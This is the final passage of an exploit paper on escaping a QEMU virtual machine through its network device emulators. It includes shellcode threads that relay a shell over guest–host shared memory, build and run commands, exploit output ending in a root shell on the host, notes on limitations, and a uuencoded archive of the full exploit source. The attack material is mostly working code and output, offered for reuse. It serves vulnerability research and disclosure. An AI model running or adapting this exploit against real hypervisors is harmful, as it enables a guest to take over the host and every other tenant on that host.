void *pipe_r2fd(void *_brwpipe) { struct brwpipe *brwpipe = (struct brwpipe *)_brwpipe; char buf[SHARED_BUFFER_SIZE]; ssize_t len; while (true) { len = sm_read(brwpipe->got, brwpipe->ring, buf, sizeof(buf)); if (len > 0) brwpipe->got->write(brwpipe->fd, buf, len); } return NULL; } SHELLCODE(pipe_r2fd) void *pipe_fd2r(void *_brwpipe) { struct brwpipe *brwpipe = (struct brwpipe *)_brwpipe; char buf[SHARED_BUFFER_SIZE]; ssize_t len; while (true) { len = brwpipe->got->read(brwpipe->fd, buf, sizeof(buf)); if (len < 0) { return NULL; } else if (len > 0) { len = sm_write(brwpipe->got, brwpipe->ring, buf, len); } } return NULL; } Note that the code of these functions are shared between the host and the guest. These threads are also instantiated in the guest machine to read user input commands and copy them on the dedicated shared memory area (in memory), and to write back the output of these commands available in the corresponding shared memory areas (out and err shared memories): void session(struct shared_io *shared_io) { size_t len; pthread_t t_in, t_out, t_err; struct GOT got; struct brwpipe *in, *out, *err; got.read = &read; got.write = &write; warnx("[!] enjoy your shell"); fputs(COLOR_SHELL, stderr); in = malloc(sizeof(struct brwpipe)); out = malloc(sizeof(struct brwpipe)); err = malloc(sizeof(struct brwpipe)); in->got = &got; out->got = &got; err->got = &got; in->fd = STDIN_FILENO; out->fd = STDOUT_FILENO; err->fd = STDERR_FILENO; in->ring = &shared_io->in; out->ring = &shared_io->out; err->ring = &shared_io->err; pthread_create(&t_in, NULL, pipe_fd2r, in); pthread_create(&t_out, NULL, pipe_r2fd, out); pthread_create(&t_err, NULL, pipe_r2fd, err); pthread_join(t_in, NULL); pthread_join(t_out, NULL); pthread_join(t_err, NULL); } The figure presented in the previous section illustrates the shared memories and the processes/threads started in the guest and the host machines. The exploit targets a vulnerable version of QEMU built using version 4.9.2 of Gcc. In order to adapt the exploit to a specific QEMU build, we provide a shell script (build-exploit.sh) that will output a C header with the required offsets: $ ./build-exploit <path-to-qemu-binary> > qemu.h Running the full exploit (vm-escape.c) will result in the following output: $ ./vm-escape $ exploit: [+] found 190 potential ObjectProperty structs in memory $ exploit: [+] .text mapped at 0x7fb6c55c3620 $ exploit: [+] mprotect mapped at 0x7fb6c55c0f10 $ exploit: [+] qemu_set_irq mapped at 0x7fb6c5795347 $ exploit: [+] VM physical memory mapped at 0x7fb630000000 $ exploit: [+] payload at 0x7fb6a8913000 $ exploit: [+] patching packet ... $ exploit: [+] running first attack stage $ exploit: [+] running shellcode at 0x7fb6a89132d0 $ exploit: [!] enjoy your shell $ shell > id $ uid=0(root) gid=0(root) ... ----[ 5.4 - Limitations Please note that the current exploit is still somehow unreliable. In our testing environment (Debian 7 running a 3.16 kernel on x_86_64 arch), we have observed a failure rate of approximately 1 in 10 runnings. In most unsuccessful attempts, the exploit fails to reconstruct the memory layout of QEMU due to unusable leaked data. The exploit does not work on linux kernels compiled without the CONFIG_ARCH_BINFMT_ELF_RANDOMIZE_PIE flag. In this case QEMU binary (compiled by default with -fPIE) is mapped into a separate address space as shown by the following listing: 55e5e3fdd000-55e5e4594000 r-xp 00000000 fe:01 6940407 [qemu-system-x86_64] 55e5e4794000-55e5e4862000 r--p 005b7000 fe:01 6940407 ... 
55e5e4862000-55e5e48e3000 rw-p 00685000 fe:01 6940407 ... 55e5e48e3000-55e5e4d71000 rw-p 00000000 00:00 0 55e5e6156000-55e5e7931000 rw-p 00000000 00:00 0 [heap] 7fb80b4f5000-7fb80c000000 rw-p 00000000 00:00 0 7fb80c000000-7fb88c000000 rw-p 00000000 00:00 0 [2 GB of RAM] 7fb88c000000-7fb88c915000 rw-p 00000000 00:00 0 ... 7fb89b6a0000-7fb89b6cb000 r-xp 00000000 fe:01 794385 [first shared lib] 7fb89b6cb000-7fb89b8cb000 ---p 0002b000 fe:01 794385 ... 7fb89b8cb000-7fb89b8cc000 r--p 0002b000 fe:01 794385 ... 7fb89b8cc000-7fb89b8cd000 rw-p 0002c000 fe:01 794385 ... ... 7ffd8f8f8000-7ffd8f91a000 rw-p 00000000 00:00 0 [stack] 7ffd8f970000-7ffd8f972000 r--p 00000000 00:00 0 [vvar] 7ffd8f972000-7ffd8f974000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] As a consequence, our 4-byte overflow is not sufficient to dereference the irq pointer (originally located in the heap somewhere at 0x55xxxxxxxxxx) so that it points to our fake IRQState structure (injected somewhere at 0x7fxxxxxxxxxx). --[ 6 - Conclusions In this paper, we have presented two exploits on QEMU's network device emulators. The combination of these exploits make it possible to break out from a VM and execute code on the host. During this work, we have probably crashed our testing VM more that one thousand times. It was tedious to debug unsuccessful exploit attempts, especially, with a complex shellcode that spawns several threads an processes. So, we hope, that we have provided sufficient technical details and generic techniques that could be reused for further exploitation on QEMU. --[ 7 - Greets We would like to thank Pierre-Sylvain Desse for his insightful comments. Greets to coldshell, and Kevin Schouteeten for helping us to test on various environments. Thanks also to Nelson Elhage for his seminal work on VM-escape. And a big thank to the reviewers of the Phrack Staff for challenging us to improve the paper and the code. --[ 8 - References [1] http://venom.crowdstrike.com [2] media.blackhat.com/bh-us-11/Elhage/BH_US_11_Elhage_Virtunoid_WP.pdf [3] https://github.com/nelhage/virtunoid/blob/master/virtunoid.c [4] http://lettieri.iet.unipi.it/virtualization/2014/Vtx.pdf [5] https://www.kernel.org/doc/Documentation/vm/pagemap.txt [6] https://blog.affien.com/archives/2005/07/15/reversing-crc/ --[ 9 - Source Code begin 644 vm_escape.tar.gz M'XL(`"[OTU@``^Q:Z7,:29;W5_%7Y*AC.L"-I<RJK*RJMML3"$H6801:0#ZV M#R)/B6BN@<(M;4_OW[XO7R*!D+KMV)C>C8V=^B"*S'?^WI$OL3]-1W:EY<(> M/_O3'@I/FB3^DZ4)W?V\>YZQF`J>BC3FXAEE4<RC9R3Y\TS:/NM5*9>$/)N6 M<J+&OT_WN?W_H\^G^_A/I^LC_:?H\`$6G/]>_".:I#[^,=!`!C"(?PS?GA'Z MIUBS]_P_C_]7XYF>K(TEKU:E&<^/KE]7=I>6X]G5_IH9S\I':Y.Q>KCF]*R< M/%R2JY5=[K&"K/)V85=^M?*5L6X\L^2B\:88#<[:IT-"6+2WW/[W@A!29>35 MJQW"VI;JM#NZZ!>#HCL$JO5DX@E%O$=PVB7^J=Y3)$F-O""L5JF`2<29EY7* M&M[B:%22A;RRH[ES*UM6[Q>E,<M:Y=>*%[.TY7HYPR7RM1>Z9QQ*?EGY+<@4 M'-BO/LE1.1]=N5GUTWQLR/,[>0?W)(NIK1,@>%DY6(W_P\)*L`&^AQ?R'>CR MY(MR.2IKJ/[U:Y+7P(C_3(%LLK+VYZHS]0UGG0R*XNUH4`S!FH.EE08WOT9- MF5\;.U+]2Q6^@X@=)&NURL'!QLL7#.C`+-"^0W?:18E(@38_Y>Q"_JZS0>`. 
M*D@",D/65/W^7[X#Y;6M'ES<0_H?#Z)5O9-?VXC[+<1W*L>SZKT!&>A_#AB^ MW`4?()W:*:3!@3-@V7QA9]7#X\5RKH]7=N*.O9JI7!S626_4;_6ZG8]W^`'] M*T)K!*0?+.QR.5]6#SW[H2<XL#?CLHI>@"T'H`:$3^5D,M?5*!%^'<I.+VZK ML%4GA^^O[=(2.27MOR'_`DJR=-7#OZY^F(%N(,+58.T.@@#UW=Z&X^-\O22+ MZ]O56,L)YJI=K<AX161)Z,U?#R_Z[1O!#^_$>GDU[_X&;.K!^]]N5_]Z_LG/ M]OS_-'T1WO[I4\`?G_]I$D7L;OY+$K_.>)S2?YW__Q//\?-*<[ZX78ZOKDM2 MU34242;JY-Q>FS$9>I?KY$*N)^14+L<6NE2E`><EDJ_@V(/6_,F:HTJE;\W8 MCPMJ78[G<!+.#%FO+!G/R`K:CK:XHL8SN;PE;KZ<KNKDEW%Y3>9+_)ROR\IT M;L8.>I,74"<2NAXTS^FX+*TAT'8_C0V\E-?0K<IK"T+`F%]@/"%Z/C-CS[1" MIJDMOZU4V!%Y:-(*CL`[6_0<1H\I1-X?W'`2H$"IYI_\UAT8LWDYUK9>*:^A M14Y`DA>PJVMF]@P!=7HBQU.[!$"BQP:`HAT$[@P`U\P:C'K"ALK&!O+?L8$$ MORIFKM=3.ROE76".`?,Y["SAV"GM<BPGJRV^&!0O<M=T<"<^(ET[1BZ_.Y-P M\H,M_GT+V?5\8H!@-M\2(>SC<E4!JX.\^7(%BF^)LCY#P/XYL3,#J]8G`Q@R MG9>6!%0@QT#@&%*,.-A`'"JKN2M_\9'>)`Y9+:SVF0-,8Y]/2Y\SLY`]JU6P M?WC6'I!![W3XOM$O"+Q?]'OOVJVB14X^DN%909J]BX_]]INS(3GK=5I%?T`: MW1:L=H?]]LGEL`<+AXT!<!Y6_$:C^Y$4'_QT-""]/FF?7W3:(`RD]QO=8;L8 MU$F[V^Q<MMK=-W4"`DBW-R2=]GE["&3#7MTKK3QF([U3<E[TFV?PM7'2[K2' M']&0T_:PZW6=@K(&##S]8;MYV6GTR<5E_Z(W*"K>K59[T.PTVN=%ZPBT@T92 MO/-C\."LT>D\Z:6W_8&/)T6ETVZ<=(J@";QLM?M%<^C=V;XU`3FPKP/SY$71 M;/N7XD,!SC3Z'V$>ZE=`YJ#XMTL@@DW2:IS#A#8@U<]``C%I7O:+<V]S[[0R MN#P9#-O#RV%!WO1Z+01Z4/3?M9O%X"7I]`:(UN6@J(.&8<,K]B(`*MB&]Y/+ M0=N#5FEWAT6_?WDQ;/>Z-?#\/<`"?C>`M87H]KKH*B#4ZW_T0CT&"'Z=O#\K M8!U"W*T@4@T/P0`0:PYWR4`?`#C<\9%TBS>=]INBVRS\;L]+>=\>%#6(57O@ M"=I![?L&Z+ST+F.,P*KPNI.Q=8PD:9^21NM=VYL=B"L0^T%[DR>P-+ALGFW@ M/JH\/Z[L7M)N5\>/+GBP-IW*6;A];2]JRX4\AJM2^?G[&XRWG[WW[=[QMJN3 M,?3VO;5%>>TO)8]NEVH^GWS1-?3Q#?;QS?2I6^UZ!NW./(3A\.]VNCZZ/GSZ M7NJ?W[F;DB^^GP;*S]Q1?^>>>D]Z]G'4;YS?D]*;;//#RM9PO!+)R?AJ!IUT M-))E:,5V-*I6-\O5>P]JM:WP<(V:N^H*[H[3&O"J]7A2CF>CO9U[#A]I:/FC M47@9C;96G+>[55DGJD:JOY(?*N3))[!5)>B2_GXK:R\_1PL"1\K3JC^@!6FO M/=G?_)]OX>M+\EMM:QNTR'[1&IU<GIX6_1!(%F7;_4[1>#LZ;WP`>*,'T#;/ M+KMOD0&V!V_AW@V!VMGN=7H@[ZR`!GSX`XWC[V/VDK+IZAJ&*?Q.Z10L.]PU M!8B;O591]0>HQURNIA"IK_S7PQ$<EM\>_H&CA-@;.-9G1%_#8(L']5=?$<_V M_8\OG]`RNF@TWU87\G8REZ9.@LY??X!KZ.9'!S35CTPCO^!Q#G?XVJYLR,G= M96_>`5P@_3WVZSOAM1>O_5[04=^3BQ[]]J1]G6&P\6H.J;:8P!^WGL&H"M]? MO/:O8!.HJV[2(6P^KU5+`()\0W`![6RT6GTP=%A\&.)[;2<!NN?%^8E/.V\, M)N#QW=OW]$<@]-*!EMS_0G"-O[J\O)=PUKV$(%>K8;U&;^A.D<+=^NQBV"?A MDOV$L`#V3H#ZPT[&XOQA2B:,;V4VN\7PP38AG.:BLD=QX8\EWQ<T@\3=%X^[ ML/<PJ2]&_0^CWOONP\2JLE>OXIW6$\C@S'R"C.Z3[1@:*J7JZ5A\][/;#O7P MRW0/OTPWD)T.R&.R*-\GZSQ)ECTB>P/-^Q%9ND_6OF@.'DECCZ1=MO;HD.R1 MM&'S*3*Q3_8P';Z$;!.,Q^PA+':VGMXGR])>P3EI88+_M7(PO&D8LZ1!S7?8 M&.OD^#D9WL#0OM++\0)G?3A@5G.XH:R7)([4N*P=$1A,#IK7XT5S:K;<<5KW M,IOSF1M?W:]R"JO]1ZL<:2_@VD.V$EHYZB^AK4#S&R_\U4)?6_WSODG.WQ+F MRY^#(5LS@I@BN-'\AC3G?C@RY,YM0.D;,O67Q_EL<EM#]OY-'Z8)CT2G%]@Y ML@O^`IPE_M>%\%NQOPCU;XB?/?88S]J!,?LBQM]>[@4EX'`"PY2/2O-BLE[= M0[=#C+0;U.^)IZ9O_0_)P7/FP?9K-\5,;=9H%M:&NVL<@W*R=L5T4=Z&-?9` M6V<4]"W`FEV%WKK^S;M.HWLGB_*`MYU)-;&`M;9PX2-(8N!Z?G5UA]B&N7G] M\V`]W3!'3S)CU%=`!%.*/WGV)`1/-A)H5-]L#/<VGO2HO!EI3,:1VO@TO.G, MYXL3"7GVW6;N@RHG_[A[3VN[)DZ`5GG:TL)U'I/)6W;\_.CH:"^Z0>'R9N2I M[M4UM+:+LE@N=U(V\H$+&_WUK-QNL.W&R1*`T')5;L,:-L[7,-!M-_AVX_;B M^G9U#TATO]&83#8[=Y$_>+^4B]WN]!W.H;!Q?M,Z;T2)V-W@%*M:=>Q,\`<L M+`M;-Z?#ZX1%NUN2TDU"W[6R5O\#[H9@;9>'.\O;";W3ZUW<+V]/T=:'\^$I M=%9<SNZ7X<K8N:/F=$=E\]U%@]Q-@;O+)TT27*,[IW[O/`C)\'C%P(9#^4$G M[;<NMM'J-S9?/-[]P3!\X0]=;_:;5;W4=<ATF*;AS:>>_WC]FD#N_43@O93J M>US[";:N:_X?A>B-<WZ6@72\LC.[E/ZWM?7*EX?_P:9Q.>S!S96TVV0QG]S. 
MYM.QG%3(\X.;G^(()JF;GR(1/N+P$189+`8JMEE@X8/B1X9_4_R;X%\>N`,1 M_&457P,K_Q.5]C]O02K>_S/;QA'(H!_!1P`+`X5/'?Q)4YK&,/3X=VNI%2S2 M_CW/:9XP)>O(D`JC.<N1@0KI>.:0(1>Q3.($&:S@>2+CP&"-RK(X0H;<:)5) MC@S4)#9G%AE2$YD\RP)#K@37D4(&JUBJE4&&5&61H2DR4.68R1DR,*-21@5* M%5)!'W.HS<4J3QG/_'O&E>7,V,`@C30\1:G"&&.Y16V.&ZZ2A"%#;.(LT6E@ MB(7.LP21$5PHF6E$S!D1N3R5R"!%HG.K`P.G+-$<D1$Q%4(;1,Q)ZF(C8F0P M-*/&)<@0*V$CJM%6KD7.:(+(F$10SBSZ)B.1IBR-`H.FL>4&;>6*@N4<D3$1 M-5GBT#>94*D2H0)#HA*9.;251RK*,X'1-4HIG1OT36JE78YS`C!$!D@LVLH3 M,%2G&%VCC:!&HV]2&1:;)$>&2)@\IA*E)H`UI3%JTYE)$^A&_ETY0P5C(C`P MQ1T@C@Q"Q9I'J$T[)?,D1\14I@SXX0)#1B.5Y8A,XFB29101TX("P`JCKAA5 M-H]X8'#"I3I#9)),9%PS1$PS,,)(C+H20D0F-LBPR6ZTE6X2"Q,N,U%$%?IF MG4D8C4(]I$RQ+,G05BJ44`E#9'*GG.42?;.9R@R/0SVD&4UU+M%6ZBAU>8S1 MS07-99:A;Y91FV<LU$/JA*00)63(!%@:871S!JFH<_3-"A$GFH9ZV%B!4ID6 M6C"!VB"!DQBR`Q,Q$M!U>:@'H:G($XM2F:),)BEJRR*:.8`,&2`&FB>A'D2B MJ,DU(L,BE=H\0<0RI:S*+$;=:045G89Z`(`-,P:188F1D>&(6*9-G&J'47<* M<EB+4`_<J$BP!&V-I2]*C<C(6,'U*D7?H%A53&VH!RZ-DPE'6V-CLCPQB(R$ M&M%<H&\`G7#<A7K@L<BA::&M,1?6Y`ZC*XU(LXRC;T8*"J$+]<`YY9%)T5;_ MGVH@PS&Z4E+)=8*^&4--JG6HAX32)&4Q2HU2&G$F49NR%)*4(6(ZIQI0#O60 MI")32812(RI<EBC4IG(A#%Q'D0':LN5YJ(?$7WQSBLA$.40DSQ$QB`[-LPBC MKE.3RDR%>DAR%<>&(3*151RR`1%3J3*)CC'JFBHIM`SUL&G>:&LNE5/0J#`1 M-PT+FS17S$1YJ`<K3<+3&&W-C8G25"(R=!-19(@-%&`6ZL'&T"`50UMS+GBL M,HPN-<((&:-OJ10RD3+4@^74:D?15N@WN7,Y1I?"5"-MA+ZE<$[D<'8@PZ;( M4&J6TDQ"!6$B6LJ@#A`QD5.A(Q?JP:4B2M($I694)`*.(&3(A8Y%BH@)*Q05 M-M2#LX8SE2(R66[@;F81,4:-3,%R9$B-X5*'>G"YR@WT)F2PREIP`AE2B(3E M&'5(/9I9$^IA`P;:*IEA>9PB,G%F,AUI](T[XUR4A'HP3"F1.K15"J4AMQ"9 MV*F$PJ&'#)F*8L%#/1@XC"+HM<C@J(3>C-&-!8VY=.@;9Y1#+$(]@/W4.HVV MR@S<<PE&-V;"9N`1,@B1*YN&>M!*,!5G*%5I`0G`4!O,(\Y$$A%+(!X6C`H, MFNHTS5&J4E3QE*(VZ,01$PH12Q(*/%&H!YTH:!`*D5'@#%41(A8IQ1.98]03 MK6)HJ*$>-!2T<Q*148FAT(H0L0B.DQS:-C(H8Z5EH1XVLPG::K6(710A,FDB MI(QS](UN#L+`H"FDED1;K:(^VQ&9-())*LW0-[KI%($A48[+#&VU<-JEDF%T M4P5%HB3Z1C=0!H;(1)G-T5:;F`1R#Z.;:J.M4^@;5489%X5ZV)PA*!6F*&XC MCMI$9HR*'2+&G)%9+$(]9$Q9!B,,,@#N$?1_9'"*IJE%Q%BF4IZFH1[\N9Q( MB\@X1^$`2Q$Q(:B`!HY19[X%JB340^9$DD,1($,F(N!%Q.#H4LX9C#J#*4H[ M'NIA4^MHJTDI-!J+R'!+>18GZ%N<0Y>*=:@'"6A'0J"M,()0!H,!,N0BYRE' MWV(+!9V:4`_2&B8D1UL-S$<)W/B0`68V"C,#,J0FBY4+]2!S\,PF:*NQ2L$L MB-'EJ8JT2]$WZ'2)^Z_VOK6YC1M9]'Z5?L7$ZR@4+=GS?JPBG_*-G7-2-XE] M96?/5MD*:YX6;8K4<BA;/G'VM]]^`#.8&<R0<AZ;[!U6V2(!=`-HH!M`H]%= MY,P/8DP(:QK#0=8.J38/6AW!"D,3T4W<V(F9'Y(X,X$="6N:0;?]B&KS7%B* M`ILH9CM9Y`<)\P/,=#^(;:(,+(*6&R=$,2_S84Q-&G4[]@L[B9@?8$4`]G&( M,JD#^]$\)HIYL0D[0(M&'?;@=EZ$&9^BRLWZ.MT8Z\V"3MBH&C*$*1B=.;+W MYDGCIZ7^3*Z+V6+53KF8G^APD];F)[+IZE0YQ?\!#^G-6Y\IX"SR->.$X]IE MO$"C`3BNS:^,JSA]FV_XKCY=K=?75WB.NX!E+%^3_EHY3DG[-EFS@'U9G:8\ MEC"\?O$*8//^@M)]EG"]90@%+Z]AG>UZ]7<!(.8825Z6Y#*7-BK\PV\7XC.+ M0&W5_W-Z+-/I#&:W@5FHLE1G!BY8S,9U;I7.D[7.\,1JV$:J?I<=5$?^*EWF M&Z$CDK/*\F$$2-ES4EL<&L9ZD2\;"9MVPF6<OO3/3Q0L,VETTRBWB+/UR_!< MG93&^F8F)EB=MI%IG09WF(!TCVC1*)MO0.->;RXXB:M%+>7FNIQ9ND2[4?/E MO-D4I1_<EL9LY3;Q7'W9N>BX[=REHH.%JKFK-H8-@8U3LGB5U/KF[/\^A^Q< MTHKZ/%NN-A?`Z2]=%\>`;X"0%!?Q,EL@&RMI\?JU)!B3AE+LQIC@U?-LE;S) MTPT:J0I@NEFK?N$=4OU+ZK?GJV6=^)J,A<6/4OT!U%\MWN5JPB*/RYQ;P3=Y M5_.K?+:VBTS<[,V2]7M,.SQ1"\`V:-TM(#ORGT]?(*7$U1Q:P1ZJ4@X33JKL M=+$J<R5_2@EU/MH&-,`QH<Y&PY\&."74^=GUE=T`QX0ZFUJN9F-"G0WB]VTC M&Q/J[!RV5N_4RBFASF<3W[K`E!/4`MF[N=+]J4A0&LC6$;,4_L>.3IL)S9[0 MP!TJ/:&$5AD<NT893.`I(*:%,A%G5VL8KO7FPPRFE5P_U#2T,(A+NED]:N6@ MYE.;L=$G"S&!;>C+#GMST5I$FU%^$CHA>H>RMS35=]5L04W,7,R7;VNR=O/3 MB_DBZQ2XS"]7ZP^D0EXMN6-X>=R;BX*\/Q<-\^+Y,A\H0G9U\ZH!VZ9'J9D> M90_YR[[Q*OMF3=F>:*+ZLH>>VUHK)*%L<;/W(K-+)(&ERM<.5*O0T&@/(VHW MMD&`[1TDR=X9$I'>P[4R%P9G,U]F^4UO"=VP*M#=H969VN&5F;5@J"C$&4-4 
M+.9+Z,W_])!165_+BWB=9[0[G\%.&^GR;K6`57^1&]AF`T0S"G?Z7GURO.UL M[+MHC>=%J)D(LV71282:7G8-C<Y/-"V;KY130[NU\^5);][J>M.?F:_7C<K$ M>JU4A>NU^IF^7FUXKV+H/K2B]%0VQ6^ZOF7Q)M96R74U:08?,A1ZZ;>V5N(C M=JD=ZE7?3I2AE=W(5LN\N0=F"R6E5=4^#WL9O\UG\_4_7MKGG:JH,\IW70>, MVM;II67:[KF^4+4";RV$2[DLA+UHV/>UNB3_$O/?5UIZGQH%Z7<>)//E@_+B M3D.67%U\$$^*3#J"[AM3F-5O\R6;8K^;KS?72]CVW4\Q)^;71)MUO"P7;&I^ M#22?;^9Y2;=[XV.Z?\O'=/*@P55=O.NT2?:B;C1E&??D!",TU8D+I'N^W[%0 M?1]_*&><"<0CP\;I7)@7\B\X_L"`\-TQIY1X/2Z&>DE-$3_@3+"F9WVKM3'! M'S3%*=GXTECRMWOW<)"F$\0+;<6D0R@WG0!:^5MY'(?%JL>%Z>753*4;MTK0 M13:2?R8JC528J3`C-*:',<[XGKR$1X&YDWF;7[<D^>9]#KQZL8*ZXN5KX_4U M-!%+G<%$??#?>#+"]Q*7P*'O<C:)0A,`QH'E>".$3VIBUC255_/E,:Z+1IRF MP.S*I3UUN[R$(9IO)D/+`7<7OAP_Q&43*,H_<+ED22-R<V%8!+CP8(,S8G4Y M3V<I;`+6DP,NA(TY,F:S1R^>?O?-5[.S)]\^^ON3QPV27,Z0,?&5(QS1C00A M`/0(!M#`C-*(2^/R.KT@&58:5ZNRG*.9CGA9LQ322.WLCK.T,I_E)DR4U6Y* MEJQ#=#KJ&/?RI(;5'0`%YD4NYK7XO6:*FD=&_`[H2>9&++WW,MI.[#V8TBC2 M[H;,CO;>7^"Z.*GHBU9),^@\;J>WD)GF/\DX94`?*@-Z:/QD/'A`%D\&K`>8 M`0![:N,T9M?'1HT.W\O^;.0@>:GY#5!EXK1!J%%*62""<7!@?*9,+7Z=>^O& M[/V\S_]4.+1KA['`PCGJ!:L\02$AJ&CL&!V.\ST%=1-FCQ83X]YIG8J)^-2I MG:90OIG5'9E370=1R#7YT:Q@ZRY^)@C8Q*8,=(VER;>0?DO.A>$64[)5_<>/ M8G[##U7RL@I(97C2^B#'-[C]_6KYQ4;N+:Z7L#?!XI!Q`6POGXS5=>(&Z1?Q M/+7BES*]X/KYLI_I9=/_=7Q/+/A0F1R_C._%R6D+W],D;(/T\/VGLWV%>)CM MQ1CT<GZ7Z1$Q3,MEF_'E:+;Y?-Y-4H@_P/J\L&YA_7KUU;*^AKV+>%'^0OZ6 M784:<$XK+"URB*NW:*+WZP.;/,M.Y1?8S[>S#B4@-(18J_=$OJ?P&S9--!K% M&L^A!?&<7-P%VN.'Q.35+^)JK.1(/BN![X<TTDAFQ/%0T%?%</R0I4>5AN<* MPL*4(L\1@ECXZ`0HI;P:JK6_^]OT]/]J\C4[W:1DU><^RE4^-IJDJ"2'2F$N M5XU9B[R]@R;(C:R_G>2D3!>7M<"OM`W?K(SU-:PK!1XN/E_/KPQZ![U:H!2F MP:@T`Q.-7F&J_*#!DAK_C;&9H?38S&A7L9F19H?4-/,EM*1\:9\?H2ZH^@X% MQ/>3[I@C*MY;3AD1KSOQ^C4"H.I`;=;Q0VKT$1'"0)4!C4FC!&I8F.I,-#%I M&V6`[/?%)4=]MH19UBB$I\6C_3VM]@D_XOGCD?'=H\=_FSU^^O73L_]#PJ13 M%79UPM0A+RO:?$&R_@*"CE3%G*93MTODS$5,VR:I:0;C1NY3X*#J3X'#=E)) M`#YH0W-SAK*AUH%L1DZWI&+B6><2)_O-$7/0/)>X*%E.1TQF'&0IT:ZCTN+= M)YTGH=U2D!6@5-.6DC35-7,7B8J7>Y-#WFW2-.Z4H+O)2=5IDA,]A6H:#)6J M2:(OA;>5LCX3.-H<*"9KM*"<-5!.UHGE;'TYNL><Z-@?Q0.O1GO55FV83,,$ MJ!N]"YFHE*Y8\U9T<L"2$F45R)%^05)I:C5<3\LI[M?T#>O62++TEU6)RPF) M\%WK!,+\.G4"(@UI4:(#,UDTX.KB5ZU@O/B!',_7<8IJ)5[<C#(G+QSUDL>_ M)QV=_;3ZJNKKV"9FR\JG'+18;&U;XO;WL-="97(@#`DPB8^/D":L!V#S$J^7 M-Y,[+S\[-_+EF]4'XP,^9J2^D4NNXNIZ4TZ4E]YXS,LD%6F1V'%-V'$)N)7$ M[PKYKEQOB_+G+QY_\_WLZV^^??+]TX8TAXRG/[RH<VJ!#CE/SLZJ'*U,GZ^. M'_;*<<SLE]V8*\9M@+\-918SLPZQIJ&PMN"S(:Y2B\O!E>7?K.;+2=T0%97( MJJK5Y%5U2-4EJSI0'PN'JK=Y5BECEQD>J]^BZ@(UML4ZS[_(C*=T^_E,W'8* M'8-063(/T<4P61P0OEEZ<;U\*V=.PU:1-1&5XCP11E@:W41#G`B]!_PY$JKM M*595(<(?L\OXIGE/,2TWJZLCZ7NOKA-+"W6P5-J?2(6]T-:CJEXV#G[>NW<H M-1TOGCY^:I1O8:_]S3-A%%FRTH.=[:E;33HEOYR?WV=S2SB?NRQNH5UX);/! M),U+?.D;0%S0\=F=SS@(\Z6!",2I`YKT+8P9#5AL$.7Q22\:RQO)ATTN&K<G M7`!P">EK`4EC'+2]3%3*#K7L*=%::CB0A"\%*>_=.Z\Z8U7ZC#W$?>]>A4O2 M_6$]6`*7(@`WJQ7IRUG,Y^6&/'!A*TIV;UB=Q@0Z57WR\WXG4UR9M.=GRX9A MHIM2`L>6F2DG:,>N#M`5J^ME]NGPZ[PX5*SSIJ_Q3G!*-X-38:A!WX1A'9W. 
MDIS?V2HS^\AX4SN1>/3BQ>SYDT=G7_W7)-YLV!$'?,&S<IG'Z_1B<L#5P\EH M`Q5I+3[^\A?,>]4^-;&+BWZ(PRZ(F.;],+BEZX*U;L`.3U[Q-AM[\MDIBSKJ MVMYEO$DO\O(E_3V'];C`20_E3C2Y-%YXIJ@I4!>#F0S??R8G(CI10?.M%A3L M!13@6'.:S8MB5OUF$4`C3AP@1ICJ/U$2H+FL<)`-I5O[/=UD$7]KK4HC]Y#8 M=4[0`K>\GH8495*\SEG8*$EE-TG,OFXR347>W!&)WM".SG@#)*(NP%=)H#V% M)/=.JQZ^D<-P7"<=6R(1P:I)<-H`PI%M@4CJR1'$:NI**V4DYSTDUA%-PV2@ M1#V7`!5L9N@2'___#V)&XZ_LDZ62<&4'A._]2P8I-2""DBTPF7HJ[6@17'[M MHB"J=U!PZJFTO&44_%5%,6W.>DH34D30:8]4*XJ"*I&WT:I9&!GR77R`G<1, M^'Z]S?K?$'2Z5?O77*"KZ^W?8WG&(9J(919?_N"'#_XW02A70$%8*G9,.;IE MM+'$F;7^&GUF93/89,N>H6>BZBY(7@X1B?O<'C&$M!$^V5Z0K(VWEB.#[*VE MV"Y[:S$RS]Y:BJVTMQ83=N1;2I%)]]929+J]M11;<&]O6-,*6^[8Q2Q4;2KD M>5?R5QJO,_$PA'U/PYE@,:G=AQPUG3+=,Z0W''%`7$Q4OQR=TF?-TN\GM;>3 MC[5_DPX8^;\1,,E$>G_Y*%V^=,NS"YG#>GJKCYJD<Y3-35NZU$^>Y`F!F;HZ M$52&8"CY04SA3207-ZM+``U..A?CE^.'V7O3^'BJ>)#ZJ+B)^E@[>?K8<.3T ML;5[4;PW?52=+S6J@:5*(W>PY60X=FH8E7';H6+[)+I<H>*W9%!<]EM`:X&I MMW(JD%Z\.V'()5-5R+PQ^\K`-_/&W3**Z\XH*FO$X+YY8/!QY[5,=,,^O)8H MBXA<%@CMJ7&`?\7N24P<M<0.$TC!*98:&!*VIYRQLJ5RCWBD&_A#3=6,B"K7 M0^!]\L!P-_$T&]F>[^RM3=Z.S7'Y6B;LP6MO$`HXXT2+]^#4^*?><9N^/&#\ MX?E_G;U`)XG=$JUY3IN57S;55;];@_-=];.EF>Z\09F5^5)>+LMQ$W>GK/ZH M]1AL?E%=0FKE`,]2<?LO\4E,\E*1Y2T*9@V/HDLOUJWS\D)OX'2+B_I2#O[` MAA!6IE3N?.KVUPYUKM?K?+E%H5.5WL3KUV+W)YF3#TQP9M7%3B`@]*U60L6Y MO#R4=0IT>&?887";^1MW:A7X_!SG83U#_FF>[*M:G)!WB14`ZC<.-;A=17:\ MD0<\VA!.A'^A-^=H[&N[N$N?3GACZ0`#S0\/\4B$Y:>3VEX9*N6M(.;_>&I4 M6+B@R",&Q.PW?$LB]2CWS@T:*92E/#[W[]^_(T(_+"GV@Q@U1N0>&6[+XEF\ M,E5V%+KGIU/^.SC6W5>@4_%R]+9@XG$I318A"T7]70&L-I,%,'\_?D@NT4[9 M7=='<J%U4H7$J,J@PYX[KV[B^-5-DKRZ2=-7-UGVZB;/7\$.GB@IBZ[YTA\D M@Y*XT26*7O>*8]$[%<TPQ*:&Z%I!IW*O)@5234GMB/9MGW@]G9>P5E=+*KW7 M3=(EGA&/.Z]GH3F4=W#*YQWY^R/]-DUS^_ZK;A+MOD1A9<'K5%IO>8;$?GM[ MQ"^.4?D%#3QAJ<M=E6=)Z?&/(4MC]1Z?0"0?V#,]L`<?+!F=?)@LO--)\=J5 MH[0:[$;^/A[9=?7H4FK[VB$L^D"0/G_QS'CR_3/CT>/'Z,2.?`3J.DQC:SL$ 